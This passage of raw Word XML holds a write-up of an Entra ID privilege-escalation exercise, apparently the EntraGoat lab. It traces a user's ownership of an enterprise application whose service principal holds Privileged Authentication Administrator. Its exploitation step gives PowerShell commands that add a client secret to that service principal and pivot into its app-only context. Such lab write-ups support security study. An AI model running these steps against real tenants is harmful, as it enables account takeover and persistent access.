                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="66C11FBB" w14:textId="77777777" w:rsidR="00530310" w:rsidRPr="00DC1FF9" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="100" w:after="300"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DC1FF9">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:noProof/>
          <w:color w:val="6B7280"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Figure 4. App registrations — Owned applications tab: “This account isn't listed as an owner of any applications.”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19EB24F3" w14:textId="77777777" w:rsidR="00530310" w:rsidRPr="00DC1FF9" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DC1FF9">
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>His one group membership, Automated-Finance-Dept, was checked for ownership and role assignment — both empty, a dead end:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CF533D9" w14:textId="77777777" w:rsidR="00530310" w:rsidRPr="00DC1FF9" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pBdr>
          <w:top w:val="single" w:sz="4" w:space="0" w:color="CBD5E1"/>
          <w:left w:val="single" w:sz="4" w:space="0" w:color="CBD5E1"/>
          <w:bottom w:val="single" w:sz="4" w:space="0" w:color="CBD5E1"/>
          <w:right w:val="single" w:sz="4" w:space="0" w:color="CBD5E1"/>
        </w:pBdr>
        <w:spacing w:before="160" w:after="40"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DC1FF9">
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="30531318" wp14:editId="7E10476C">
            <wp:extent cx="4953000" cy="3076575"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="2033094893" name="Grafik 203309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076575"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="15D3072B" w14:textId="77777777" w:rsidR="00530310" w:rsidRPr="00DC1FF9" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="100" w:after="300"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DC1FF9">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:noProof/>
          <w:color w:val="6B7280"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Figure 5. Automated-Finance-Dept membership: David Martinez and Pradeep Gupta.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BC6AF7F" w14:textId="77777777" w:rsidR="00530310" w:rsidRPr="00DC1FF9" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pBdr>
          <w:top w:val="single" w:sz="4" w:space="0" w:color="CBD5E1"/>
          <w:left w:val="single" w:sz="4" w:space="0" w:color="CBD5E1"/>
          <w:bottom w:val="single" w:sz="4" w:space="0" w:color="CBD5E1"/>
          <w:right w:val="single" w:sz="4" w:space="0" w:color="CBD5E1"/>
        </w:pBdr>
        <w:spacing w:before="160" w:after="40"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DC1FF9">
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5190F3EB" wp14:editId="40EA579C">
            <wp:extent cx="4953000" cy="2819400"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1815492689" name="Grafik 181549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819400"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="704781C9" w14:textId="77777777" w:rsidR="00530310" w:rsidRPr="00DC1FF9" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="100" w:after="300"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DC1FF9">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:noProof/>
          <w:color w:val="6B7280"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Figure 6. Automated-Finance-Dept — Owners tab: 0 group owners found.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="024AF662" w14:textId="77777777" w:rsidR="00530310" w:rsidRPr="00DC1FF9" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pBdr>
          <w:top w:val="single" w:sz="4" w:space="0" w:color="CBD5E1"/>
          <w:left w:val="single" w:sz="4" w:space="0" w:color="CBD5E1"/>
          <w:bottom w:val="single" w:sz="4" w:space="0" w:color="CBD5E1"/>
          <w:right w:val="single" w:sz="4" w:space="0" w:color="CBD5E1"/>
        </w:pBdr>
        <w:spacing w:before="160" w:after="40"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DC1FF9">
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="792FE252" wp14:editId="3D0A5E26">
            <wp:extent cx="4953000" cy="2657475"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1133547054" name="Grafik 113354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57475"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="10DAB28B" w14:textId="77777777" w:rsidR="00530310" w:rsidRPr="00DC1FF9" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="100" w:after="300"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DC1FF9">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:noProof/>
          <w:color w:val="6B7280"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Figure 7. Automated-Finance-Dept — Roles and administrators: no roles found.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31004708" w14:textId="77777777" w:rsidR="00530310" w:rsidRPr="00DC1FF9" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="220" w:after="80"/>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DC1FF9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
          <w:color w:val="1E3A5F"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Step 4 — The key finding: enterprise application ownership</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72B1C1CA" w14:textId="77777777" w:rsidR="00530310" w:rsidRPr="00DC1FF9" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DC1FF9">
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>App registration ownership and enterprise application ownership are tracked separately in Entra ID. Checking Enterprise Applications revealed David Martinez as Owner (“Configuration Owner”) of Finance Analytics Dashboard — the application that stood out earlier by its unusually recent creation date among David's other SaaS-looking entries:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="286451F4" w14:textId="77777777" w:rsidR="00530310" w:rsidRPr="00DC1FF9" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pBdr>
          <w:top w:val="single" w:sz="4" w:space="0" w:color="CBD5E1"/>
          <w:left w:val="single" w:sz="4" w:space="0" w:color="CBD5E1"/>
          <w:bottom w:val="single" w:sz="4" w:space="0" w:color="CBD5E1"/>
          <w:right w:val="single" w:sz="4" w:space="0" w:color="CBD5E1"/>
        </w:pBdr>
        <w:spacing w:before="160" w:after="40"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DC1FF9">
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="51CAA31B" wp14:editId="65E031B3">
            <wp:extent cx="4953000" cy="2724150"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1553559334" name="Grafik 155355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724150"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BA8C2F3" w14:textId="77777777" w:rsidR="00530310" w:rsidRPr="00DC1FF9" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="100" w:after="300"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DC1FF9">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:noProof/>
          <w:color w:val="6B7280"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Figure 8. Finance Analytics Dashboard (Enterprise Application) — Owners: David Martinez, Configuration Owner.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="044BBECB" w14:textId="77777777" w:rsidR="00530310" w:rsidRPr="00DC1FF9" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="220" w:after="80"/>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DC1FF9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
          <w:color w:val="1E3A5F"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Step 5 — Confirming the ownership had no standing API access</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68E33567" w14:textId="77777777" w:rsidR="00530310" w:rsidRPr="00DC1FF9" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DC1FF9">
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Before assuming malicious capability, the SP's existing permission grants and registration-level access were checked and found empty — ownership itself, not a pre-existing permission, is what makes the application exploitable:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F84B171" w14:textId="77777777" w:rsidR="00530310" w:rsidRPr="00DC1FF9" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pBdr>
          <w:top w:val="single" w:sz="4" w:space="0" w:color="CBD5E1"/>
          <w:left w:val="single" w:sz="4" w:space="0" w:color="CBD5E1"/>
          <w:bottom w:val="single" w:sz="4" w:space="0" w:color="CBD5E1"/>
          <w:right w:val="single" w:sz="4" w:space="0" w:color="CBD5E1"/>
        </w:pBdr>
        <w:spacing w:before="160" w:after="40"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DC1FF9">
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="64DF99A2" wp14:editId="7115D47C">
            <wp:extent cx="4953000" cy="3009900"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1100079796" name="Grafik 110007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009900"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="50983403" w14:textId="77777777" w:rsidR="00530310" w:rsidRPr="00DC1FF9" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="100" w:after="300"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DC1FF9">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:noProof/>
          <w:color w:val="6B7280"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Figure 9. Finance Analytics Dashboard — Permissions: no admin consented permissions found.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A102995" w14:textId="77777777" w:rsidR="00530310" w:rsidRPr="00DC1FF9" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pBdr>
          <w:top w:val="single" w:sz="4" w:space="0" w:color="CBD5E1"/>
          <w:left w:val="single" w:sz="4" w:space="0" w:color="CBD5E1"/>
          <w:bottom w:val="single" w:sz="4" w:space="0" w:color="CBD5E1"/>
          <w:right w:val="single" w:sz="4" w:space="0" w:color="CBD5E1"/>
        </w:pBdr>
        <w:spacing w:before="160" w:after="40"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DC1FF9">
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6D8583D1" wp14:editId="361EE2FC">
            <wp:extent cx="4953000" cy="2971800"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="244396658" name="Grafik 24439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971800"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="591838CE" w14:textId="77777777" w:rsidR="00530310" w:rsidRPr="00DC1FF9" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="100" w:after="300"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DC1FF9">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:noProof/>
          <w:color w:val="6B7280"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Figure 10. App registration — API permissions: none configured.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11482476" w14:textId="77777777" w:rsidR="00530310" w:rsidRPr="00DC1FF9" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pBdr>
          <w:top w:val="single" w:sz="4" w:space="0" w:color="CBD5E1"/>
          <w:left w:val="single" w:sz="4" w:space="0" w:color="CBD5E1"/>
          <w:bottom w:val="single" w:sz="4" w:space="0" w:color="CBD5E1"/>
          <w:right w:val="single" w:sz="4" w:space="0" w:color="CBD5E1"/>
        </w:pBdr>
        <w:spacing w:before="160" w:after="40"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DC1FF9">
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="59F6B357" wp14:editId="684AE99E">
            <wp:extent cx="4953000" cy="3028950"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="754725139" name="Grafik 75472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028950"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="17AB6C61" w14:textId="77777777" w:rsidR="00530310" w:rsidRPr="00DC1FF9" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="100" w:after="300"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DC1FF9">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:noProof/>
          <w:color w:val="6B7280"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Figure 11. App registration — Certificates &amp; secrets: 0 client secrets.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="266990D8" w14:textId="77777777" w:rsidR="00530310" w:rsidRPr="00DC1FF9" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pBdr>
          <w:top w:val="single" w:sz="4" w:space="0" w:color="CBD5E1"/>
          <w:left w:val="single" w:sz="4" w:space="0" w:color="CBD5E1"/>
          <w:bottom w:val="single" w:sz="4" w:space="0" w:color="CBD5E1"/>
          <w:right w:val="single" w:sz="4" w:space="0" w:color="CBD5E1"/>
        </w:pBdr>
        <w:spacing w:before="160" w:after="40"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DC1FF9">
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1CF14A83" wp14:editId="6FC43D95">
            <wp:extent cx="4953000" cy="3105150"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1147067795" name="Grafik 114706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105150"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AE66C83" w14:textId="77777777" w:rsidR="00530310" w:rsidRPr="00DC1FF9" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="100" w:after="300"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DC1FF9">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:noProof/>
          <w:color w:val="6B7280"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Figure 12. App registration — Owners: no owners assigned at the registration level (ownership sits only at the enterprise-application layer).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34DDA05A" w14:textId="77777777" w:rsidR="00530310" w:rsidRPr="00DC1FF9" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="220" w:after="80"/>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DC1FF9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
          <w:color w:val="1E3A5F"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Step 6 — Confirming the SP's directory role</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="355D7077" w14:textId="77777777" w:rsidR="00530310" w:rsidRPr="00DC1FF9" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DC1FF9">
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>The Entra admin center confirmed the service principal is directly assigned Privileged Authentication Administrator — a role capable of resetting authentication methods, including passwords, for any user in the tenant, including Global Administrators:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CB061EA" w14:textId="77777777" w:rsidR="00530310" w:rsidRPr="00DC1FF9" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pBdr>
          <w:top w:val="single" w:sz="4" w:space="0" w:color="CBD5E1"/>
          <w:left w:val="single" w:sz="4" w:space="0" w:color="CBD5E1"/>
          <w:bottom w:val="single" w:sz="4" w:space="0" w:color="CBD5E1"/>
          <w:right w:val="single" w:sz="4" w:space="0" w:color="CBD5E1"/>
        </w:pBdr>
        <w:spacing w:before="160" w:after="40"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DC1FF9">
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="567B6D98" wp14:editId="582852C8">
            <wp:extent cx="4953000" cy="2476500"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1043931133" name="Grafik 104393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476500"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="75A9424B" w14:textId="77777777" w:rsidR="00530310" w:rsidRPr="00DC1FF9" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="100" w:after="300"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DC1FF9">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:noProof/>
          <w:color w:val="6B7280"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Figure 13. Privileged Authentication Administrator — Assignments: Finance Analytics Dashboard (Service principal), Direct, Assigned.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="796133D9" w14:textId="77777777" w:rsidR="00530310" w:rsidRPr="00DC1FF9" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DC1FF9">
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>This was independently reproduced by the custom AI agent after extending graph_client.py with get_sp_directory_roles, querying the unified RBAC endpoint /roleManagement/directory/roleAssignments.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="210F0EBC" w14:textId="77777777" w:rsidR="00530310" w:rsidRPr="00DC1FF9" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="220" w:after="80"/>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DC1FF9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
          <w:color w:val="1E3A5F"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Step 7–9 — Exploitation: credential pivot and privilege abuse</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59B5025C" w14:textId="77777777" w:rsidR="00530310" w:rsidRPr="00DC1FF9" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DC1FF9">
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Authenticated as David Martinez and added a new client secret to the owned service principal (an action permitted to any SP owner, with no approval or alert):</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="9500" w:type="dxa"/>
        <w:tblBorders>
          <w:top w:val="single" w:sz="4" w:space="0" w:color="334155"/>
          <w:left w:val="single" w:sz="4" w:space="0" w:color="334155"/>
          <w:bottom w:val="single" w:sz="4" w:space="0" w:color="334155"/>
          <w:right w:val="single" w:sz="4" w:space="0" w:color="334155"/>
        </w:tblBorders>
        <w:tblCellMar>
          <w:left w:w="10" w:type="dxa"/>
          <w:right w:w="10" w:type="dxa"/>
        </w:tblCellMar>
        <w:tblLook w:val="0000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:noHBand="0" w:noVBand="0"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="9500"/>
      </w:tblGrid>
      <w:tr w:rsidR="00530310" w:rsidRPr="00DC1FF9" w14:paraId="7451842F" w14:textId="77777777">
        <w:tblPrEx>
          <w:tblCellMar>
            <w:top w:w="0" w:type="dxa"/>
            <w:bottom w:w="0" w:type="dxa"/>
          </w:tblCellMar>
        </w:tblPrEx>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9500" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="0F1A2B"/>
            <w:tcMar>
              <w:top w:w="140" w:type="dxa"/>
              <w:left w:w="180" w:type="dxa"/>
              <w:bottom w:w="140" w:type="dxa"/>
              <w:right w:w="180" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="102868E1"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Connect-MgGraph -TenantId &lt;PEARSON_TENANT_ID&gt; -Scopes "User.Read"</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="794C30F7"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$SP = Get-MgServicePrincipal -Filter "displayName eq 'Finance Analytics Dashboard'"</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7AFF5A87"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$passwordCredential = @{ DisplayName = "EntraGoat-Secret"; EndDateTime = (Get-Date).AddDays(30) }</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3140F557"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$newSecret = Add-MgServicePrincipalPassword -ServicePrincipalId $SP.Id -PasswordCredential $passwordCredential</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2410CDAB"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$clientSecret = $newSecret.SecretText</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="33AEE267"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$tenantId = (Get-MgOrganization).Id</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5730559E"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Disconnect-MgGraph</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="7648ED97" w14:textId="77777777" w:rsidR="00530310" w:rsidRPr="00DC1FF9" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DC1FF9">
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Pivoted from the delegated (user) context into the app-only context by authenticating as the service principal itself, using the newly added secret:</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="9500" w:type="dxa"/>
        <w:tblBorders>
          <w:top w:val="single" w:sz="4" w:space="0" w:color="334155"/>
          <w:left w:val="single" w:sz="4" w:space="0" w:color="334155"/>
          <w:bottom w:val="single" w:sz="4" w:space="0" w:color="334155"/>
          <w:right w:val="single" w:sz="4" w:space="0" w:color="334155"/>
        </w:tblBorders>
        <w:tblCellMar>
          <w:left w:w="10" w:type="dxa"/>
          <w:right w:w="10" w:type="dxa"/>
        </w:tblCellMar>
